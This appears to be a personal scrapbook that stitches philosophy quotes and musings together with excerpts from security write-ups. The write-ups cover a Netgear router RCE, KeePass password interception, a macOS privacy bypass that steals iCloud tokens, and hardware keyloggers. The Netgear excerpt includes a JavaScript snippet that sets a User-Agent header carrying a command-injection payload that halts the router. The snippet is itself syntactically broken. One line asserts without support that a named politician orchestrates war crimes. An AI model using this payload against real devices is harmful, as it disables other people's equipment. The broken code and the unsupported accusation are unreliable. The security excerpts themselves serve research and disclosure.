Rascals are always sociable, and the chief sign that a man has any nobility in his character is the little pleasure he takes in others company. Arthur Schopenhauer

A breakdown of a bug SEFCOM T0 and I exploited to achieve a WAN-side RCE in some Netgear RAX routers for pwn2own 2022. The bug is a remotely accessible command injection due to bad packet logging, cataloged as CVE-2023-24749. A One-Click WAN-side RCE in Netgear RAX Routers

Quote simple, one might add.

Object.defineProperty(navigator, 'userAgent', {
	get: function () { return 'TEST'; }
const xhr = new XMLHttpRequest()"GET", "/")
xhr.setRequestHeader("User-Agent", '"; ledCli ALLSW MSG_LED_ALL_SW_OFF; sleep 1; halt -f;"');

This challenge is designed for beginners and professionals who want to learn python programming language. It may take 30 to 100 days to complete the challenge, people who actively participate on the telegram group have a high probability of completing the challenge. 30 days of Python programming challenge

The universe is the rotting corpse of a God who killed himself. Philipp Mainländer

You probably know Friedrich Nietzsche’s famous quote “When you stare into the abyss, the abyss stares back at you.” I’d rather say: stare harder. Feel the coldness enter your bones. When you are one with it, force it to embody the meaning you carry. You’re not stuck here with the void, the void is stuck here with you.

Imagine a number of men in chains, all under sentence of death, some of whom are each day butchered in the sight of others those remaining see their own condition in that of their fellows, and looking at each other with grief and despair await their turn. This is an image of the human condition. Blaise Pascal, Pensées

With the recent KeePass2 disputed CVE-2023-24055 and all the fuss around it, it motivated me to finish a little project I had started last year. My goal was to see if I could find a way to intercept the Master Password of a KeePass2 database. For fun and learning ofc. Having fun with KeePass2: DLL Hijacking and hooking APIs

These vulnerabilities were first disclosed at TyphoonCon in Seoul during my talk What happens on your Mac, stays on Apple’s iCloud?! Bypassing Mac privacy mechanisms. I found 2 code injection opportunities in iMovie and GarageBand which allowed me impersonating their entitlements. Then, I was able to talk to iCloud XPC helper which gave me the user’s iCloud tokens. With these tokens, I was able to get all the data that is synchronized with iCloud and is normally protected via TCC (Contacts, Reminders, Calendars, Location, etc). Bypass TCC via iCloud

I’m pretty sure Hillary Clinton has cute old lady hobbies when she’s not orchestrating war crimes in the Middle East.

Use this Burp plugin to automatically spin up a DigitalOcean droplet whenever Burp starts, and shut it down whenever Burp closes. The droplet functions as a SOCKS5 proxy, and the Burp settings are automatically updated to route traffic through the droplet. DigitalOcean droplet proxy for Burp Suite

Every now and again something will happen that’s so stupid it could only happen in real life because it it happened in a book people would say it were bad writing. I live for these stupid moments.

Hardware keyloggers can be bought online for a couple of dollars and are very appreciated due to their discretion because they cannot be discovered by endpoint security software. The only condition for attackers is the usage of an external keyboard. We can assume they are used for espionage, while no public communication exists for such usage apart from a few articles. They can be bought on many websites, even Amazon, making them commonly used in private life, for example during a divorce. Many vendors also highlight their usage for monitoring employees. These vendors also sell other kind of recording devices, such as video (recording VGA, HDMI or DVI), RS232 and even Ethernet loggers. For all these tools, the price varies according to storage capacity and features (time keeping, Wi-Fi access…). Additionally, backdoored keyboards or small PCBs to insert in existing ones can also easily be bought online. Hardware investigation of wireless keyloggers

You live in a world where movies are deemed good or bad by the composition of the production staff. Statements are factual depending not only on who says it, but why they say it. Products are purchased because of how the raw materials were sourced.

You don’t eat strawberries, you drink Baskin Robbins strawberry ice cream-flavored sugar-free pea-protein meal replacement powder. You order small jumbo popcorn chicken at the drive-thru. You’ve only seen Plato’s cave via VR headset … on a Twitch stream.

Recently, I stumbled upon a OpenBSD effort that attempts to make it harder to perform a ROP-based exploitation against sshd: sshd random relinking at boot

It comes down to this line in the Makefile:

cc -o sshd `echo ${OBJS} | tr ' ' '\n' | sort -R` ${LDADD}

The essence of the idea is to simply pass the .o files in a random order to the linker. Their order inside the sshd binary won’t be predictable. On reboot, OpenBSD relinks the binary. This ensures that it’ll differ between OpenBSD installations and thus, offsets for ROP gadgets will vary too. The idea is that this has the potential to make an attackers life harder, as a standard ROP attack requires inspecting the target binaries. Fun with Gentoo: Why don’t we just shuffle those ROP gadgets away?

To begin, we are going to take a look at the fundamentals of analyzing office documents and office attacks. Office attacks are just one of the many methods that malware authors are utilizing in order to infiltrate computers at this time, and they can do so utilizing one of three different approaches. Static malware analysis: Office documents

The wise man holds knowledge and doesn’t let it disturb his mind. The fool gets mad with information. Learn to separate both things.

I feel strangely drawn to that which is abandoned or forgotten. Books that very few people read nowadays, about topics that very few people care about, passion projects of people on the internet who never made it, niche, old games, dilapidated houses, small town city streets at 3AM. Their loneliness calls out to me. Not in a hipster way, but in the sense that they have a strange pull to them that is hard to explain.

Social media will destroy your ability to read and write longer than a twitter post. Brevity may be the soul of wit, but I feel that without the alternative it’s just a husk.

If I would start writing another kernel (and accompanying OS) it would definitely be a microkernel that would burn all POSIX bridges. Something like L4.